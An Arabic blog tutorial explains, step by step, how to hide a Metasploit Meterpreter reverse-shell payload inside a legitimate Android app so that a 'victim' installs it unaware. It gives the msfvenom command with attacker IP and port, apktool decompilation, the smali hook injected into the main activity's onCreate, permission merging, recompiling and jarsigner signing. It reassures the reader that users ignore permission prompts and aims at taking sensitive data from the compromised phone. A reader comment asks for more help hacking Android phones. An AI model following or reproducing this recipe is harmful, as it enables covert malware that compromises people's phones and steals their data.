عمل بايلود في ملف apk الاصلي بالميتاسبلويت

عمل بايلود في ملف apk الاصلي بالميتاسبلويت

عمل بايلود apk,عمل بايلود بصيغة بايثون,بايلود,عمل بايلود للاندرويد,كيفيه عمل كونفج لبرنامج apk custom,دمج بايلود الاندرويد apk باي تطبيق,عمل بيلود، صنع payload,بايلود بصيغة بايثون,شرع عمل بيلود، شرح صنع payload,صنع بايلود,بايلود بصيغة,بايلود بصيغة py,تعلم كيف تصنع بايلود,بايلود بصيغة pythone,انشاء بايلود، طريقة انشاء بيلود، payload,تعلم كيف تقوم بصنع بايلود,دمج بايلود الميتاسبلويد,دمج بايلود الاندرويد باي تطبيق,دمج بايلود الاندرويد بالألعاب

 

ال Metasploit الرائد ، او Metpreter ، قوي جدًا في تصمين وعمل متعدد للبايلود. بمجرد التثبيت على جهاز الضحية ، يمكننا القيام بكل ما نريد لنظامهم عن طريق إرسال أوامر إليه. على سبيل المثال ، يمكننا الحصول على بيانات حساسة من النظام المخترق.

تأتي حمولة Meterpreter أيضًا كملف apk. قابل للتثبيت لأنظمة Android. عظيم! الآن يمكننا استخدام Metasploit لاختراق هواتف Android أيضًا. ولكن إذا جربت هذه البايلود ، فستعرف أنها لا تبدو مقنعة. لن يقوم أي شخص في عقله الصحيح بتثبيت وتشغيل مثل هذا التطبيق ، والذي يبدو أنه لا يفعل شيئًا عند فتحه. إذن كيف سنجعل الضحية تشغل تطبيق الحمولة في هواتفهم؟

أحد الحلول هو أنه يمكنك تضمين البايلود داخل تطبيق شرعي آخر. سيبدو التطبيق ويتصرف تمامًا مثل التطبيق الأصلي ، لذلك لن يعرف الضحية حتى أن نظامه معرض للخطر. هذا ما سنفعله في هذا البرنامج التعليمي.


سنحتاج إلى بعض المكتبات والأدوات في الخطوات التالية ، لذلك أعتقد أنه من الأفضل إذا قمت بتثبيتها الآن.

لتثبيت المكتبات المطلوبة ، أدخل هذا الأمر :

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

وللحصول على أحدث إصدار من ApkTool ، توجه إلى هذا الموقع واتبع تعليمات التثبيت.

قم أيضًا بتنزيل ملف apk الذي تريد أن يكون مستترًا من أي مصدر تريده. ما عليك سوى إجراء بحث في Google "app_name apk download" وستظهر Google الكثير من النتائج. احفظ ملف apk هذا في ملفات root.

1- عمل البايلود 

 

اولا ، علينا أن بتوليد البايلود. سنستخدم MSFVenom لهذا الغرض. الأمر -

msfvenom -p android/meterpreter/Payload_Type LHOST=IP_Address LPORT=Incoming_Port -o 
meterpreter.apk

استبدل Payload_Type بأي من البايلودات التالية المتاحة. وظيفة جميع هذه البايلودات متشابهة ، وهي في الأساس جميع حمولات Metpreter ، والفرق هو فقط في الطريقة التي يستخدمونها للاتصال بنظام Kali الخاص بك. أنواع Payload_Typs المتاحة هي -

1.reversetcp
2.reverse_http
3.reverse_https

سنستخدم https كمثال :


استبدل عنوان IP_Address بعنوان IP الذي سيتم توصيل البايلود إليه ، أي عنوان IP الخاص بنظام المهاجم. إذا كنت تنوي تنفيذ هذا الهجوم عبر شبكة محلية (على سبيل المثال ، إذا كان الضحية والمهاجم متصلين بنفس نقطة اتصال WiFi) ، فسيكون عنوان IP المحلي الخاص بك كافيًا. لمعرفة ما هو IP المحلي الخاص بك ، قم بتشغيل الأمر -

ifconfig


إذا كنت تنوي تنفيذ هذا الهجوم عبر الإنترنت ، فيجب عليك استخدام عنوان IP العام الخاص بك.

استبدل Incoming_Port مع رقم المنفذ . الذي تريد استخدامه بواسطة البايلود للاتصال بنظامك. يمكن أن يكون هذا أي منفذ صالح باستثناء المنفذ المحجوز مثل المنفذ 80 (HTTP). سأستخدم 4895 كمثال.

لذا قم بتشغيل الأمر باستخدام استبدال الكلمات الرئيسية بقيم مناسبة وسيقوم MSFVenom بإنشاء حمولة "meterpreter.apk" في ملفات root.
لاحظ أننا حددنا اسم ملف الإخراج باستخدام وسيطة "-o meterpreter.apk" في الأمر ، لذلك إذا أردت ، يمكنك تسميته بأي شيء آخر أيضًا.

عمل بايلود في ملف apk الاصلي بالميتاسبلويت 

  2- فك ملفات APK:

الآن علينا فك ملفات APK ، لذلك سنستخدم APKTool. يقوم بفك الشفرة إلى تنسيق قابل للقراءة إلى حد ما ويحفظه في ملفات smali ، و استخرج ملفات xml بنجاح. بافتراض أنك قمت بالفعل بتثبيت أحدث أداة apk ولديك أيضًا ملف apk الأصلي في ملفات root ، قم بتشغيل الأوامر التالية

apktool d -f -o payload /root/meterpreter.apk

apktool d -f -o original /root/Original_APK_Name\

عمل بايلود في ملف apk الاصلي بالميتاسبلويت 

3- نسخ ملفات البايلود :

 

الآن علينا نسخ ملفات الحمولة إلى مجلد التطبيق الأصلي. ما عليك سوى الانتقال إلى "/ root / payload / smali / com / metasploit / stage" ونسخ جميع ملفات smali التي يحتوي اسم ملفها على كلمة "بايلود". الآن قم بلصقها في "/ root / original / smali / com / metasploit / stage". لاحظ أن هذا المجلد غير موجود ، لذلك عليك إنشاؤه. 

4- حقن الكود في ملف APK الاصلي : 

 

لهذا ، يجب علينا أولاً معرفة النشاط الذي نضعه ببساطة ، activities هي أقسام من الكود ، وهي تشبه الإطارات في برمجة Windows عند تشغيل التطبيق. يمكننا الحصول على هذه المعلومات من ملف AndroidManifest.xml.

لذا افتح ملف AndroidManifest.xml الموجود داخل المجلد "/ root / original" باستخدام أي محرر نصوص. إذا كنت تعرف HTML ، فسيبدو هذا الملف مألوفًا لك. كلاهما بشكل أساسي لغات ترميز ، وكلاهما يستخدم العلامات المألوفة وهيكل السمات مثل <tag سمة = "value"> المحتوى </ tag>. على أي حال ، ابحث عن علامة <activity> التي تحتوي على كلا الخطين

<action android: name = "android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER"/>

ملاحظة جانبية ، يمكنك استخدام CTRL + F للبحث داخل المستند في أي محرر نصوص GUI. عند تحديد موقع هذا النشاط ، لاحظ قيمة السمة "android: name". في حالتي ، كما ترون من لقطة الشاشة أدناه ، فهي "com.piriform.ccleaner.ui.activity.MainActivity". 

عمل بايلود في ملف apk الاصلي بالميتاسبلويت 

يشير هذين السطرين اللذين بحثنا عنهما إلى أن هذا هو activitie الذي سيبدأ عندما نطلق التطبيق من أيقونة المشغل ، وهذا أيضًا MAIN activity يشبه الوظيفة "الرئيسية" في البرمجة التقليدية.

الآن بعد أن أصبح لدينا اسم activitie الذي نريد حقن hook فيه ، دعنا نصل إليه، افتح كود .smali لهذا activitie باستخدام gedit. فقط افتح تيرمينال واكتب


gedit / root / original / smali / Activity_Path


استبدل Activity_Path بـ "android: name" لل activitie ، ولكن بدلاً من النقاط ، اكتب شرطة مائلة. في الواقع ، يتم تخزين رموز smali في مجلدات مسماة بتنسيق "android: name" ، حتى نتمكن بسهولة من الحصول على موقع رمز smali بالطريقة التي قمنا بها. تحقق من لقطة الشاشة أدناه وستحصل على فكرة عما أحاول قوله.



ابحث الآن عن السطر التالي في كود smali باستخدام CTRL + F

onCreate(Landroid/os/Bundle;)V<-;

عند تحديد موقعه ، قم بلصق الكود التالي في السطر المجاور له

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 


ما نقوم به هنا هو إدخال رمز يبدأ البايلود إلى جانب الرمز الحالي الذي يتم تنفيذه عند بدء activitie. الآن ، قم بحفظ ملف smali. 







5- ادخال الأذونات الضرورية: 

 

إذا لم نذكر جميع الأذونات الإضافية التي ستحتاجها حمولتنا ، فلن تتمكن من العمل بشكل صحيح. أثناء تثبيت التطبيق ، يتم عرض هذه الأذونات للمستخدم. لكن معظم المستخدمين لا يهتمون بقراءة جميع تلك النصوص المملة ، لذلك لا داعي للقلق كثيرًا.

يتم سرد هذه الأذونات أيضًا في ملف AndroidManifest الذي تمت مواجهته سابقًا. لذلك دعونا نفتح AndroidManifest.xml لكل من التطبيق الأصلي والحمولة من المجلدات المعنية. يتم ذكر الأذونات داخل علامة <uses-permission> كسمة "android: name". انسخ بنود الأذونات الإضافية من AndroidManifest الخاص بـ Payload إلى التطبيق الأصلي. ولكن كن حذرا أنه لا ينبغي أن يكون هناك أي تكرار.


ها هو AndroidManifest بتطبيقي الأصلي قبل التعديل

عمل بايلود في ملف apk الاصلي بالميتاسبلويت 

بعد إضافة الإضافات من Payload Android Manifest ، يبدو  كهذا /root/original/AndroidManifest.xml

عمل بايلود في ملف apk الاصلي بالميتاسبلويت 

 6-RECOMPILE the ORIGINAL APK:


الآن تم الانتهاء من جميع الأجزاء الصعبه! علينا فقط إعادة recompile التطبيق الخلفي إلى ملف apk قابل للتثبيت. قم بتشغيل الأمر التالي

 apktool b /root/original

 عمل بايلود في ملف apk الاصلي بالميتاسبلويت

سيكون لديك الآن ملف apk المترجم داخل دليل /root/original/dist لكن ، ما زلنا لم ننتهي بعد.

7- تسجيل ملف  APK :

 

هذه أيضًا خطوة مهمة جدًا ، كما هو الحال في معظم الحالات ، لا يمكن تثبيت ملف apk غير موقع. من developer.android.com

يتطلب Android توقيع جميع التطبيقات رقميًا بشهادة قبل أن يتم تثبيتها. يستخدم Android هذه الشهادة لتحديد مؤلف التطبيق ، ولا يلزم توقيع الشهادة من قبل مرجع مصدق. غالبًا ما تستخدم تطبيقات Android الشهادات الموقعة ذاتيًا. يحمل مطور التطبيق المفتاح الخاص للشهادة.

في هذه الحالة ، سنقوم بتوقيع apk باستخدام مفتاح  android الافتراضي. فقط قم بتشغيل الأمر التالي


jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass 
android -digestalg SHA1 -sigalg MD5withRSA apk_path androiddebugkey

تأكد من استبدال apk_path في الأمر أعلاه بالمسار إلى ملف apk backdoored الخاص بك.

عمل بايلود في ملف apk الاصلي بالميتاسبلويت 
شارك الموضوع
تعليقات
  1. كيف حقن بايلود apk مع صوره اخطراق الاندرويد ممكن شرح مفصل من فضلك و

    ردحذف

إرسال تعليق